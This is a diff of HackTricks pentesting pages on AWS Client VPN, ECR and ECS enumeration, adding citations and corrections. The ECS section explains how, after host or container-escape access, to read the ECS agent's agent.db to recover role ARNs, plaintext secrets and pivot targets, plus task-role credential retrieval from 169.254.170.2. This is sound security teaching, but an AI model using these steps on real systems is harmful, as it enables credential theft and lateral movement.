-- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
+- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.<sup>[[15]](#references)</sup>
 
 ### Client VPN <a href="#what-is-components" id="what-is-components"></a>
 
-**Connect from your machine to your VPC**
+**Connect from your machine to your VPC.**<sup>[[17]](#references)</sup>
 
 #### Concepts
 
-- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
-- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
-- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
+- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.<sup>[[17]](#references)</sup>
+- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**; Client VPN can also attach directly to a transit gateway. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. For subnet associations, all subnets must be from the same VPC, and each subnet must belong to a different Availability Zone.<sup>[[17]](#references)[[18]](#references)</sup>
+- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.<sup>[[17]](#references)</sup>
+- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.<sup>[[17]](#references)</sup>
+- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.<sup>[[17]](#references)</sup>
+- **Client CIDR range:** For IPv4 traffic, this is an IP address range from which to assign client IP addresses; each IPv4 connection receives a unique address from the range, for example, `10.2.0.0/16`. For IPv6 traffic, AWS Client VPN automatically assigns the client CIDR range.<sup>[[17]](#references)</sup>
+- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.<sup>[[17]](#references)</sup>
+- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, AWS creates Client VPN network interfaces in that subnet. **Traffic sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. For IPv4 traffic, source network address translation (SNAT) translates the source IP address from the client CIDR range to the Client VPN network interface IP address; IPv6 traffic is not SNATed.<sup>[[17]](#references)</sup>
+- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.<sup>[[17]](#references)</sup>
+- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.<sup>[[17]](#references)</sup>
 
 #### Limitations
 
-- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
-- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-- The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
-- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
-- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
-- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-- Client VPN supports **IPv4** traffic only.
-- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
-- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
+- **IPv4 client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.<sup>[[18]](#references)</sup>
+- IPv4 client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**<sup>[[18]](#references)</sup>
+- A **portion of the addresses** in the IPv4 client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.<sup>[[18]](#references)</sup>
+- The **IPv4 client CIDR range cannot be changed** after you create the Client VPN endpoint.<sup>[[18]](#references)</sup>
+- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.<sup>[[18]](#references)</sup>
+- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.<sup>[[18]](#references)</sup>
+- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.<sup>[[18]](#references)</sup>
+- Client VPN supports **IPv4, IPv6, and dual-stack** traffic. For IPv6 or dual-stack traffic, the associated subnets must have compatible IPv6 or dual-stack CIDR ranges.<sup>[[18]](#references)</sup>
+- AWS GovCloud (US) Client VPN endpoints use FIPS 140-3 validated cryptographic modules; check the target Region's documentation for FIPS requirements.<sup>[[19]](#references)</sup>
+- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.<sup>[[18]](#references)</sup>
 
   ```
   SCRV1:<base64_encoded_string>:<base64_encoded_string>
   ```
 
-- The self-service portal is **not available for clients that authenticate using mutual authentication**.
+- The self-service portal is **not available for clients that authenticate using mutual authentication**.<sup>[[18]](#references)</sup>
+
+## References
+
+- [1] [How Amazon VPC works](https://docs.aws.amazon.com/vpc/latest/userguide/how-it-works.html)
+- [2] [IP addressing for your VPCs and subnets](https://docs.aws.amazon.com/vpc/latest/userguide/vpc-ip-addressing.html)
+- [3] [Subnet CIDR blocks](https://docs.aws.amazon.com/vpc/latest/userguide/subnet-sizing.html)
+- [4] [Subnet route tables](https://docs.aws.amazon.com/vpc/latest/userguide/subnet-route-tables.html)
+- [5] [Gateway endpoints for Amazon S3](https://docs.aws.amazon.com/vpc/latest/privatelink/vpc-endpoints-s3.html)
+- [6] [Control subnet traffic with network access control lists](https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html)
+- [7] [Control traffic to your AWS resources using security groups](https://docs.aws.amazon.com/vpc/latest/userguide/vpc-security-groups.html)
+- [8] [Associate Elastic IP addresses with resources in your VPC](https://docs.aws.amazon.com/vpc/latest/userguide/vpc-eips.html)
+- [9] [How VPC peering connections work](https://docs.aws.amazon.com/vpc/latest/peering/vpc-peering-basics.html)
+- [10] [NAT gateway use cases](https://docs.aws.amazon.com/vpc/latest/userguide/nat-gateway-scenarios.html)
+- [11] [Flow logs basics](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-basics.html)
+- [12] [Flow log limitations](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-limitations.html)
+- [13] [Flow log records](https://docs.aws.amazon.com/vpc/latest/userguide/flow-log-records.html)
+- [14] [Publish flow logs to CloudWatch Logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-cwl.html)
+- [15] [What is AWS Site-to-Site VPN?](https://docs.aws.amazon.com/vpn/latest/s2svpn/VPC_VPN.html)
+- [16] [How AWS Site-to-Site VPN works](https://docs.aws.amazon.com/vpn/latest/s2svpn/how_it_works.html)
+- [17] [What is AWS Client VPN?](https://docs.aws.amazon.com/vpn/latest/clientvpn-admin/what-is.html)
+- [18] [Rules and best practices for using AWS Client VPN](https://docs.aws.amazon.com/vpn/latest/clientvpn-admin/what-is-best-practices.html)
+- [19] [AWS Client VPN in AWS GovCloud (US)](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-vpnclient.html)
+- [20] [Subnets for your VPC](https://docs.aws.amazon.com/vpc/latest/userguide/configure-subnets.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -1,51 +1,51 @@
 # AWS - ECR Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## ECR
 
 ### Basic Information
 
-Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
+Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.<sup>[[1]](#references)</sup>
 
-ECR is compose by 2 types of objects: **Registries** and **Repositories**.
+ECR is organized around **registries** that contain **repositories**; private and public registries are documented separately.<sup>[[2]](#references)[[8]](#references)</sup>
 
 **Registries**
 
-Every AWS account has 2 registries: **Private** & **Public**.
+AWS provides each account with a default **private** ECR registry and a default **public** ECR registry.<sup>[[3]](#references)[[7]](#references)</sup>
 
 1. **Private Registries**:
 
-- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
-  - The URI of a **private repository** follows the format `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`
-- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
-- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
+- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.<sup>[[3]](#references)[[5]](#references)</sup>
+  - The URI of a **private repository** follows the format `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`.<sup>[[3]](#references)[[13]](#references)</sup>
+- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.<sup>[[3]](#references)[[5]](#references)</sup>
+- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS and ECS.<sup>[[2]](#references)</sup>
 - **Other private registry options**:
-  - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
-  - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
-  - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
-  - Specific **IAM policies** can be configured to grant different **permissions**.
-  - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
+  - Enabling tag immutability **prevents** image **pushes** with **pre-existing tags** from overwriting the images.<sup>[[9]](#references)</sup>
+  - A repository's encryption configuration can use AES-256, KMS, or dual-layer KMS encryption and is set when the repository is created.<sup>[[10]](#references)</sup>
+  - Pull-through cache rules can sync an upstream registry into a private repository; when an image is first pulled through the ECR URI, ECR creates a repository and caches that image.<sup>[[11]](#references)</sup>
+  - **IAM**, repository, and registry policies can be configured to grant different **permissions** at the corresponding scope.<sup>[[5]](#references)[[6]](#references)</sup>
+  - The **scanning configuration** allows ECR to scan images for software vulnerabilities.<sup>[[12]](#references)</sup>
 
 2. **Public Registries**:
 
-- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
-  - The URI of a **public repository** is like `public.ecr.aws/<random>/<name>`. Although the `<random>` part can be changed by the admin to another string easier to remember.
+- **Public accessibility**: Container images stored in an ECR Public repository are **publicly available to pull**; ECR Public supports both unauthenticated and authenticated pulls.<sup>[[7]](#references)[[8]](#references)</sup>
+  - The URI of a **public repository** is like `public.ecr.aws/<registry_alias>/<repository_name>:<image_tag>`. A default alias is assigned after the first public repository is created, and a custom alias can be requested.<sup>[[7]](#references)</sup>
 
 **Repositories**
 
-These are the **images** that in the **private registry** or to the **public** one.
+Repositories hold Docker images, Open Container Initiative (OCI) images, and other OCI-compatible artifacts, and are created inside a private or public registry.<sup>[[2]](#references)[[4]](#references)[[8]](#references)</sup>
 
 > [!NOTE]
-> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
+> The repository must exist before a push unless a repository-creation template applies. Tag the local image with the target ECR registry and repository URI before pushing; the local image's pre-push name does not have to match the ECR repository name.<sup>[[13]](#references)</sup>
 
 #### Registry & Repository Policies
 
-**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
+Private ECR **registries** and **repositories** have policies that can grant permissions to other principals or accounts. The following repository-policy example uses an organization-path condition to allow the listed image actions to principals in the selected AWS Organizations path.<sup>[[5]](#references)[[6]](#references)[[14]](#references)</sup>
 
 <figure><img src="../../../images/image (280).png" alt=""><figcaption></figcaption></figure>
 
 ### Enumeration
+
+The AWS CLI operations below enumerate private registries, repositories, images, replication status, scan findings, pull-through-cache rules, public repositories, and registry or repository policies. The pull-through-cache operation takes registry or repository-prefix filters rather than an image ID; the linked CLI references document the required inputs for each operation.<sup>[[15]](#references)[[16]](#references)[[17]](#references)[[18]](#references)[[19]](#references)[[20]](#references)[[21]](#references)[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 # Get repos
@@ -55,9 +55,9 @@ aws ecr describe-registry
 # Get image metadata
 aws ecr list-images --repository-name <repo_name>
 aws ecr describe-images --repository-name <repo_name>
-aws ecr describe-image-replication-status --repository-name <repo_name> --image-id <image_id>
-aws ecr describe-image-scan-findings --repository-name <repo_name> --image-id <image_id>
-aws ecr describe-pull-through-cache-rules --repository-name <repo_name> --image-id <image_id>
+aws ecr describe-image-replication-status --repository-name <repo_name> --image-id imageTag=<tag>
+aws ecr describe-image-scan-findings --repository-name <repo_name> --image-id imageTag=<tag>
+aws ecr describe-pull-through-cache-rules
 
 # Get public repositories
 aws ecr-public describe-repositories
@@ -95,9 +95,29 @@ In the following page you can check how to **abuse ECR permissions to escalate p
 
 ## References
 
-- [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
+- [1] [Welcome - Amazon Elastic Container Registry](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
+- [2] [Concepts and components of Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/concept-and-components.html)
+- [3] [Amazon ECR private registry](https://docs.aws.amazon.com/AmazonECR/latest/userguide/Registries.html)
+- [4] [Amazon ECR private repositories](https://docs.aws.amazon.com/AmazonECR/latest/userguide/Repositories.html)
+- [5] [Private repository policies in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html)
+- [6] [Private registry permissions in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html)
+- [7] [Amazon ECR public registries](https://docs.aws.amazon.com/AmazonECR/latest/public/public-registries.html)
+- [8] [What Is Amazon Elastic Container Registry Public?](https://docs.aws.amazon.com/AmazonECR/latest/public/what-is-ecr.html)
+- [9] [Preventing image tags from being overwritten in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-tag-mutability.html)
+- [10] [Encryption at rest - Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/encryption-at-rest.html)
+- [11] [Sync an upstream registry with an Amazon ECR private registry](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache.html)
+- [12] [Scan images for software vulnerabilities in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html)
+- [13] [Pushing a Docker image to an Amazon ECR private repository](https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html)
+- [14] [AWS global condition context keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html)
+- [15] [AWS CLI describe-repositories command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-repositories.html)
+- [16] [AWS CLI describe-registry command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-registry.html)
+- [17] [AWS CLI list-images command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/list-images.html)
+- [18] [AWS CLI describe-images command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-images.html)
+- [19] [AWS CLI describe-image-replication-status command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-image-replication-status.html)
+- [20] [AWS CLI describe-image-scan-findings command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-image-scan-findings.html)
+- [21] [AWS CLI describe-pull-through-cache-rules command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-pull-through-cache-rules.html)
+- [22] [AWS CLI ecr-public describe-repositories command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr-public/describe-repositories.html)
+- [23] [AWS CLI get-registry-policy command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/get-registry-policy.html)
+- [24] [AWS CLI get-repository-policy command reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/get-repository-policy.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
@@ -1,33 +1,33 @@
 # AWS - ECS Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## ECS
 
 ### Basic Information
 
-Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
+Amazon **Elastic Container Service (ECS)** provides a managed control plane to **run containerized applications**. Tasks and services can use EC2, Fargate, External, or Amazon ECS Managed Instances infrastructure; Fargate provides serverless compute without requiring you to manage the underlying instances.<sup>[[1]](#references)[[2]](#references)</sup>
 
-ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
+At a high level, ECS uses **Clusters**, **Services**, and **Task Definitions** to organize and run tasks.<sup>[[1]](#references)[[3]](#references)[[20]](#references)</sup>
 
-- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
-- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
-  - There **2 types of applications**:
-    - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
-    - **Task**: A standalone task that runs and terminates. For example, a batch job.
+- **Clusters** are logical groups of ECS tasks and services. Tasks can run on EC2, Fargate, External, or Amazon ECS Managed Instances infrastructure, and capacity providers can control the compute capacity used by tasks.<sup>[[1]](#references)[[2]](#references)</sup>
+- **Services** are created inside a cluster and are responsible for **running and maintaining tasks**. A service definition can specify the desired task count, auto scaling, capacity provider strategy, and networking information such as VPC subnets and security groups.<sup>[[3]](#references)</sup>
+  - The two common ways to run work are:
+    - **Service**: A scheduler-managed group of tasks for long-running work, such as a web application. If a task stops, the service scheduler can launch a replacement to maintain the desired count.<sup>[[3]](#references)[[20]](#references)</sup>
+    - **Task**: A standalone run of a task definition, commonly used for work such as a batch job.<sup>[[20]](#references)</sup>
   - Among the service applications, there are **2 types of service schedulers**:
-    - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
-    - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
-- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
-  - Check **env variables for sensitive info**!
+    - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If a task shuts down, a replacement is launched in the same or a different node.<sup>[[4]](#references)</sup>
+    - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that meets the requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.<sup>[[4]](#references)</sup>
+- **Task Definitions** are responsible for **defining what containers will run** and the parameters configured for those containers, such as **port mappings**, **environment variables**, and the Docker **entrypoint**.<sup>[[5]](#references)[[6]](#references)[[20]](#references)</sup>
+  - Check **environment variables for sensitive information**. AWS recommends using Secrets Manager or Systems Manager Parameter Store rather than placing secret material directly in plaintext environment variables.<sup>[[7]](#references)</sup>
 
 ### Sensitive Data In Task Definitions
 
-Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
+Task definitions configure the containers that run in ECS, so they can expose useful image, command, networking, environment, role, and secret metadata during an assessment.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[20]](#references)</sup>
 
-Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
+Pacu's `ecs__enum` module can enumerate ECS clusters, container instances, services, and task-definition ARNs; use `describe-task-definition` to retrieve the full definition and inspect its fields.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI operations below map to the ECS List and Describe APIs. Inspect the responses for task roles, container settings, environment variables, and secret references.<sup>[[9]](#references)[[10]](#references)[[7]](#references)</sup>
 
 ```bash
 # Clusters info
@@ -55,13 +55,15 @@ aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
 
 ### On-Host Enumeration via the ECS Agent State DB (`agent.db`)
 
-When you have **shell access on an ECS container instance** , or you have **escaped a container with a host bind-mount of `/var/lib/ecs`** (a common misconfiguration when tasks run privileged or with `volumesFrom` exposing the host data dir), the ECS agent leaves `agent.db` on disk that can be read **without any AWS API call**, **without any IAM permission**, and **without triggering CloudTrail**.
+When you have **shell access on an ECS container instance**, or you have **escaped a container with a host bind-mount of `/var/lib/ecs`**, the ECS agent's local state may be available without an ECS API call or IAM permission. On Linux, the standard host data directory is `/var/lib/ecs`, and the current agent creates `agent.db` in its data directory using BoltDB; treat this file as sensitive because it can contain task and container configuration.<sup>[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```
 /var/lib/ecs/data/agent.db
 ```
 
 (or, when reading from a container that has the host mounted at `/host`, `/host/var/lib/ecs/data/agent.db`).
+
+The current agent stores task and container objects as JSON values inside BoltDB buckets, so `strings` can recover printable portions of the records. Output is lossy; use a BoltDB-aware parser when complete records or reliable field boundaries are required.<sup>[[12]](#references)[[13]](#references)[[15]](#references)</sup>
 
 ```bash
 # Most useful one-liner — dumps everything readable
@@ -80,15 +82,14 @@ tr -s '{}[],:"\\' '\n' < /tmp/agent.txt | sed 's/^[[:space:]]*//; s/[[:space:]]*
 
 #### What you can recover
 
-Depending on the cluster's age and workload churn, `strings` against `agent.db` typically yields:
+Depending on the agent version, local cleanup settings, and workload churn, `strings` against `agent.db` may yield:
 
-- **Task and execution IAM role ARNs** (`taskRoleArn`, `executionRoleArn`) for every task the agent has run — useful targets for [credential retrieval via the task metadata endpoint](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html) (`169.254.170.2`).
-- **Full task definitions** — image URIs (often private ECR repos), command, entrypoint, port mappings, mount points, log configuration, and **plaintext environment variables** that frequently include database URLs, API tokens, and third-party secrets.
-- **Secrets references** — `secretOptions` and `secrets` blocks pointing at SSM Parameter Store paths and Secrets Manager ARNs (great pivot list).
-- **Container instance ARN, cluster ARN, and registration token** — confirms the cluster name and account/region context with no API call.
-- **ENI metadata** — private IPs, MAC addresses, subnet IDs, and security group IDs assigned in `awsvpc` mode (useful for lateral movement planning).
-- **Image pull credentials** — when the task definition uses `repositoryCredentials`, the referenced Secrets Manager ARN is here; on older agents private-registry auth blobs (`ECS_ENGINE_AUTH_DATA`) may also be cached.
-- **Recently-stopped task containers** — including names, IDs, exit codes and labels, sometimes long after the corresponding `aws ecs describe-tasks` call has aged them out of the API response.
+- **Task and credential metadata** — task records include task and execution credential identifiers, while containers with task roles receive an `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` value. AWS documents retrieving task-role credentials from `169.254.170.2` by using that relative URI from inside the task; see the [task metadata endpoint guidance](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html).<sup>[[14]](#references)[[19]](#references)</sup>
+- **Task and container configuration** — image URIs, commands, entrypoints, port mappings, mount points, and environment maps can be serialized in agent state. Plaintext environment values may therefore include database URLs, API tokens, or other application secrets when they were configured that way.<sup>[[13]](#references)[[14]](#references)[[7]](#references)</sup>
+- **Secret and registry references** — the container state model includes secret references and private-registry authentication metadata such as the Secrets Manager parameter and region. The current model does not serialize its runtime ECR pull credentials, so do not assume reusable registry passwords are present in `agent.db`.<sup>[[7]](#references)[[13]](#references)[[14]](#references)[[17]](#references)</sup>
+- **Cluster, container-instance, and network metadata** — the agent persists cluster and container-instance metadata, while ENI records can contain interface IDs, MAC addresses, private IP addresses, subnet-gateway information, and DNS fields.<sup>[[16]](#references)[[18]](#references)</sup>
+- **Legacy agent configuration** — EC2 agent setups may use `ECS_ENGINE_AUTH_DATA` for Docker registry authentication; inspect the agent configuration separately because this setting is not evidence that the auth material is stored in `agent.db`.<sup>[[11]](#references)</sup>
+- **Recently-stopped task containers** — local task and container records can include names, runtime IDs, statuses, and exit codes until the agent's configured cleanup removes them. These records are local state and may be useful even when the current `aws ecs describe-tasks` response no longer contains the same stopped task.<sup>[[11]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ### Unauthenticated Access
 
@@ -116,8 +117,27 @@ In the following page you can check how to **abuse ECS permissions to escalate p
 ../aws-persistence/aws-ecs-persistence/README.md
 {{#endref}}
 
+## References
+
+- [1] [Amazon ECS clusters](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html)
+- [2] [Amazon ECS launch types and capacity providers](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/capacity-launch-type-comparison.html)
+- [3] [Amazon ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html)
+- [4] [Amazon ECS service deployment controllers and strategies](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_service-options.html)
+- [5] [Amazon ECS task definition parameters for Fargate](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definition_parameters.html)
+- [6] [Amazon ECS task definition parameters for EC2](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definition_parameters_ec2.html)
+- [7] [Pass sensitive data to an Amazon ECS container](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/specifying-sensitive-data.html)
+- [8] [Pacu ECS enumeration module](https://raw.githubusercontent.com/RhinoSecurityLabs/pacu/master/pacu/modules/ecs__enum/main.py)
+- [9] [DescribeTaskDefinition](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_DescribeTaskDefinition.html)
+- [10] [AWS CLI ECS command reference](https://docs.aws.amazon.com/cli/latest/reference/ecs/)
+- [11] [Amazon ECS Container Agent README](https://github.com/aws/amazon-ecs-agent/blob/master/README.md)
+- [12] [Amazon ECS Agent BoltDB data client](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/data/client.go)
+- [13] [Amazon ECS Agent JSON database accessor](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/vendor/github.com/aws/amazon-ecs-agent/ecs-agent/data/client.go)
+- [14] [Amazon ECS Agent container state model](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/api/container/container.go)
+- [15] [Amazon ECS Agent task data persistence](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/data/task_client.go)
+- [16] [Amazon ECS Agent application state loading](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/app/data.go)
+- [17] [Amazon ECS Agent registry authentication model](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/agent/api/container/registryauth.go)
